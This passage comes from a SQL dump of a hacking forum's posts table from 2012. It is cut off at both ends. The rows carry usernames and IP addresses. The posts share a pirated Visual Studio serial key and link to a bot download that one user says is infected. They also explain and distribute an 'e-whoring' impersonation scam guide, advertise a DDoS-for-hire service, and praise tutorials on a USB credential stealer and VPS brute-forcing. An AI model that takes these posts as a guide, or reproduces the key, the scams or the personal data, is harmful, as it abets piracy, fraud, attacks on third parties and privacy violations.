[url=https://www.virustotal.com/file/33ac331ad6480e2fcfef65c21a071afc4376d037b20e6365b7a3dbf308492206/analysis/1345123735/]link[/url] [url=http://www.2shared.com/file/ZpGN69iE/phpv1.html]Download link[/url] Password [quote] phpv1[/quote] Developed by yuly', '72.231.24.165', '1223104677', '1', '0', '5', '1348274919', '1', 'eaa5bfe7dec838eefbd6b9ce54fb4b6e', '0', '1348274919'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2438', '405', '1885', '29', 'RE: Adf.ly Mass Clicking Bot', '0', '5', 'Timmy', '1348274999', 'Thank you. I needed this but why is it infected?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ea904fad95573c86e1effa622d48fad2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2439', '414', '1900', '29', 'RE: Maximize Profits Using Google Adsense', '0', '5', 'Timmy', '1348275035', 'Thanks a lot for the contribution. You are to0o0o0 active you should do post here and then you PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '897c8e096370ed82d51acb3bd1317a90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2440', '376', '1738', '54', 'RE: ExpressVPN codes', '0', '5', 'Timmy', '1348275069', 'does expressvpn keep logs?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49965c68a806ce70a16c242b42363367', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2441', '501', '0', '43', 'Visual Studio-Ultimate 2012 serial', '0', '5', 'Timmy', '1348275199', 'Visual Studio 2012 has been released and the most of us is looking for getting it for free. How to get it for free? Just follow the mini tutorial below. But if you have already installed the Visual Studio Ultimate 2012 in your machine ignore the #1 step and go at #2 step. #1 Step. Install Visual Studio Ultimate 2012 -Download the web-installer of the VS Ultimate 2012. (If you want to see more visit the Download page.) -After you have download the web-installer just double-click it and start the proccess of installation. -Follow the steps,choose your options and then the setup will start downloading and installing the VS Ultimate, like the previews Visual Studios if you are not a begginer. -Check the second (#2) step to see how to activate and register your product. #2 Step. Register your Visual Studio Ultimate 2012 -After the installation of the VS Ultimate has finished, find the \" HELP \" tab from toolbar on top and click it. -Then find and open the \" Register Product \" and insert the serial key that you will find bellow. Serial Key: RBCXF-CVBGR-382MK-DFHJ4-C69G8 Credits: nitro_hitman', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '62aa450d082f3acbdfe6720ee19c2abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2442', '465', '2194', '11', 'RE: What is ewhoring', '0', '5', 'Timmy', '1348275387', 'You pretend to be a female and be a online whore by using other girls pics & videos and earn money.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '126a266558b8e8314ab69ef497ca4a80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2443', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '9', 'p420', '1348275522', 'Awesome. Do anonymous have their own site?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5484f6235520b895618a82cf6204dbca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2444', '439', '2432', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348277273', '[quote=\'t3h jok3r\' pid=\'2432\' dateline=\'1348274288\'] 1. Where are the group requirements? 2. Where are the userbar and the ficon images? [/quote] Should I just delete the thread instead? And like remake it after? Since I am very busy these days.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb1f2d4b2e06f1f93f9fae4ad5805d65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2445', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1348277702', 'Thanks for the report timmy.', '72.231.24.165', '1223104677', '1', '0', '1', '1348277731', '1', 'c80c033d4a6346dcb5eb34495174c12d', '0', '1348277731'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2446', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348277961', 'Granted. But you got fired/demoted the next day. I wish I had 5000 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99cb604971e37f22d92f465607557dfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2447', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348277992', 'But your body needs the nutrients the food gives you..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ab85a80fcd89e72402f7b0f4ee9f1fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2448', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348278115', '-__- Google it t3h jok3r... Or, let me do it for you. [url=http://adf.ly/D461j] Click[/url] I Googled \"Minecraft\". It\'s basically a game that allows you to mine, and craft.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fcbf248c243da92d730c6f291faa18d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2449', '414', '1900', '29', 'RE: Maximize Profits Using Google Adsense', '0', '82', 'iTzIpod', '1348278205', 'But I find that too much work @Timmy. And thanks. No problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b30389990422b4d3f89bc8b2418fb0f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2450', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '2', 'Apathy', '1348316227', 'Awesome tutorial thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '95fd3fef0d8d318e9c2ba1e85e72b6d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2451', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '2', 'Apathy', '1348316289', 'Cool tut thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '51daa42b378c1cc3aaf3667761df2f81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2452', '490', '2381', '49', 'RE: Forum Suggestion', '0', '53', 'sirchamp', '1348325495', '[quote] It\'s basically a game that allows you to mine, and craft. [/quote] Ahhh Now I now what minecraft means. :P', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '90ea271f9b7f45a9e7c86deb33ef2e10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2453', '439', '2429', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348327666', '[quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\'] @MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc). [/quote] Well I got alot of ebooks worth 2-100$, that would help it ? :D', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e5d1a82dee8d330554c6ab722c734f7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2454', '490', '2381', '49', 'RE: Forum Suggestion', '0', '194', 'Slender Man', '1348328069', 'How do people not know what that is?....', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '993e5d5f7e127992fef198e69517c87b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2455', '439', '2453', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348330738', '[quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\'] [quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\'] @MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc). [/quote] Well I got alot of ebooks worth 2-100$, that would help it ? :D [/quote] Sure. Just making threads that can lead to discussion is basically \"contributing\" :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '842e2a1eca92c64789d64c0bf5a365bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2456', '439', '2455', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348331121', '[quote=\'iTzIpod\' pid=\'2455\' dateline=\'1348330738\'] [quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\'] [quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\'] @MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc). [/quote] Well I got alot of ebooks worth 2-100$, that would help it ? :D [/quote] Sure. Just making threads that can lead to discussion is basically \"contributing\" :D [/quote] So I am in or not ? ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e7bf378ec73ee49439104e6bfd3fe69e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2457', '439', '2456', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348331307', '[quote=\'MistaCode\' pid=\'2456\' dateline=\'1348331121\'] [quote=\'iTzIpod\' pid=\'2455\' dateline=\'1348330738\'] [quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\'] [quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\'] @MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc). [/quote] Well I got alot of ebooks worth 2-100$, that would help it ? :D [/quote] Sure. Just making threads that can lead to discussion is basically \"contributing\" :D [/quote] So I am in or not ? ;) [/quote] Why not check? O_o Scroll down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a886d0e553d207bd1dc1bff91550505e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2458', '502', '0', '61', 'Ultimate E-Whoring guide', '0', '172', 'MistaCode', '1348332082', 'Well this is the one that Snow.Eskimo is selling, but I\'m releasing it for free ! To View: [url=http://adf.ly/DDBAr] Click[/url] To Download : [url=http://adf.ly/DDBDR] Click[/url] Password: l33thacking.net Enjoy.', '88.193.83.195', '1489064899', '0', '0', '82', '1348713360', '1', '0686f968d18f4e14da11934295502f15', '0', '1348713360'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2461', '493', '2430', '35', 'RE: My Ugly Gamer Userbars', '0', '61', 'NXK', '1348346674', '[quote=\'iTzIpod\' pid=\'2430\' dateline=\'1348255180\'] When are you making the Usergroup though? :o [/quote] Whenever the joker has time.', '99.253.94.204', '1677549260', '1', '0', '61', '1348346687', '1', '225b728d8db95c44fd3514be5f0dc940', '0', '1348346687'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2460', '493', '2459', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348334604', '[quote=\'MistaCode\' pid=\'2459\' dateline=\'1348334465\'] I simply love Mr. Carter\'s Design ;) Here\'s hes userbars: http://imgur.com/a/BCjPw It includes the stars ;) [/quote] That has nothing to do with my thread. :/ Did you rate it? No. You were just talking about his userbars :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce562930a1b5a0d363956766e271e276', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2462', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348367835', 'Because I\'m not into gaming.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4e6860e3d8833d1981e313942b0efe2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2463', '477', '2325', '19', '[Junk]Jok3r is going..', '0', '1', 't3h jok3r', '1348367868', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2464', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348407516', 'hmmm, something like this? [img]http://i.imgur.com/kTxUr.gif[/img] if you want the original icon I can fix it', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd7f581078dd77b12a53ef96642df7cc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2465', '503', '0', '3', 'Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348444173', 'We are sorry for the inconvenience. L33THacking was down for the whole day because the server was having some problems by my hosting. Now the server is up, I bought 3 more spare servers just in-case something happens. From now on L33THacking will never go down for a long time. Labrocca (AKA Omniscient) refused to update the myawards plugin, so I will myself try to correct all the errors in the plugin. The plugin should be back in 5 days or so.', '72.231.24.165', '1223104677', '1', '0', '1', '1348459397', '1', '16b29eeabca36a7b721f545b162cc9d4', '0', '1348459397'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2466', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348444834', 'Lol you can\'t get fired. I would ban you for spamming even if all your posts were legit :P I wish I had 1 million dollars.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6128d17409bdf87308369992ee6205e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2467', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348448008', 'Granted but market prices raised. You can now buy apples for 1 million dollars. Enjoy your apple :D I wish I was Admin :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b96a5fbe8126e4cf5ace2d8ccd951e50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2468', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348448099', 'Oh. So that was why LH was down.. And for the Awards Plugin, once it comes back, will we be refunded all of our awards?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e65507c27a1969142189ff5796a1813', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2469', '431', '2464', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348448232', '[quote=\'R?????zo?\' pid=\'2464\' dateline=\'1348407516\'] hmmm, something like this? [img]http://i.imgur.com/kTxUr.gif[/img] if you want the original icon I can fix it [/quote] I don\'t dig the font. I\'m looking for something better to go well with the Userbar. And the icon is alright. Like a meh. I\'m not saying it\'s bad. I\'m just saying it\'s alright in my opinion..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32d4395711345674ef87fc90b0e013c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2470', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348448304', 'Alright. I\'ll try to make more Userbars if I got the time.... This weekend, I spent 90% of it on homework. 3% CoD :( & 7% Partying.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c7b64f777973df1d507f98aed7cbb41e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2471', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '61', 'NXK', '1348448392', 'I was thinking we were getting DDoS\'d Glad to see everything is back up.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '2f1c85ced9b474f40575735cdf0a7a2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2472', '398', '2339', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348448441', '[quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\'] Proof please (Picture/Video). [/quote] I can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a02124b8814668a94c4995d0354470fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2473', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348451709', 'I agree with NXK. t3h jok3r. Can you check if we have been DDoSed please? :/ I mean these \"problems\" you were talking about could\'ve been caused because of a DDoS Attack.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb70dc1cdd2f6826467e171017bd0904', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2474', '503', '2473', '3', 'RE: Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348453029', '[quote=\'iTzIpod\' pid=\'2473\' dateline=\'1348451709\'] I agree with NXK. t3h jok3r. Can you check if we have been DDoSed please? :/ I mean these \"problems\" you were talking about could\'ve been caused because of a DDoS Attack. [/quote] As I said, it was a problem behalf of the hosting company. We don\'t really have haters at the moment. When it comes to the awards, yes all the awards would be given back to the users or maybe I would have to re-add them manually but if I do then not every single one would be given back. I was planning to get my new PC today but my luck is not with me and hopefully I can it by Wednesday. Til then please bear with me if any problems come up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd8c32e3c985661ded1192f2b2a60d08f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2475', '398', '2472', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348453097', '[quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\'] [quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\'] Proof please (Picture/Video). [/quote] I can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61. [/quote] Umm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '85c6c1960e1577c985d0838b2869bbbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2476', '493', '2461', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348453162', '[quote=\'NXK\' pid=\'2461\' dateline=\'1348346674\'] [quote=\'iTzIpod\' pid=\'2430\' dateline=\'1348255180\'] When are you making the Usergroup though? :o [/quote] Whenever the joker has time. [/quote] Oh, I was waiting for your confirmation and the details including userbar lol. Send me the info.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22a8834e01e5afe3b08341bd407c60ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2477', '345', '2273', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1348453316', '[quote=\'iTzIpod\' pid=\'2273\' dateline=\'1347935566\'] [quote=\'NXK\' pid=\'2267\' dateline=\'1347935261\'] [quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\'] Will try this out now. Might take a while since I have loads of homework to do. [hr] EDIT: Sorry, but these are very bad.. I had to finish up my homework.. Truly sorry. Here you go Made a few. NOTE: Some of them, I messed up on. So.. yeah.. [img]http://i.imgur.com/6IrpX.png[/img] [img]http://i.imgur.com/TA6YN.png[/img] [IMG]http://i.imgur.com/X7sfo.png[/IMG] [IMG]http://i.imgur.com/6Qoo4.png[/IMG] [img]http://i.imgur.com/iLWJi.png[/img] [IMG]http://i.imgur.com/r6WJM.png[/IMG] [IMG]http://i.imgur.com/hvGIF.png[/IMG] [IMG]http://i.imgur.com/ordbC.png[/IMG] [IMG]http://i.imgur.com/sNucP.png[/IMG] [IMG]http://i.imgur.com/CWKlk.png[/IMG] [IMG]http://i.imgur.com/jXBZk.png[/IMG] [IMG]http://i.imgur.com/0pJoK.png[/IMG] @NXK, sorry :/ [/quote] THIS IS WHY I LOVE YOU Every single one of those are amazing man. Deffinatly going to be picking one of these. [/quote] You\'re kidding. Reloadzor has better GFX Talent then me. You gotta admit. Animated GFX Userbars are sexy. I would make one, but I don\'t know how. Plus, I rushed these. [/quote] He isn\'t, they remind him of old school gaming that\'s why he will be picking one of them.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '344b1e2e31e3a5653b73f1798c0fa169', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2478', '431', '2469', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348453351', '[quote=\'iTzIpod\' pid=\'2469\' dateline=\'1348448232\'] [quote=\'R?????zo?\' pid=\'2464\' dateline=\'1348407516\'] hmmm, something like this? [img]http://i.imgur.com/kTxUr.gif[/img] if you want the original icon I can fix it [/quote] I don\'t dig the font. I\'m looking for something better to go well with the Userbar. And the icon is alright. Like a meh. I\'m not saying it\'s bad. I\'m just saying it\'s alright in my opinion.. [/quote] I actually find the userbar good :) It\'s just the font that needs a little change.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '94776b203369127284854f428a4711ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2479', '398', '2475', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348454032', '[quote=\'t3h jok3r\' pid=\'2475\' dateline=\'1348453097\'] [quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\'] [quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\'] Proof please (Picture/Video). [/quote] I can provide a picture/video for proof. Just be 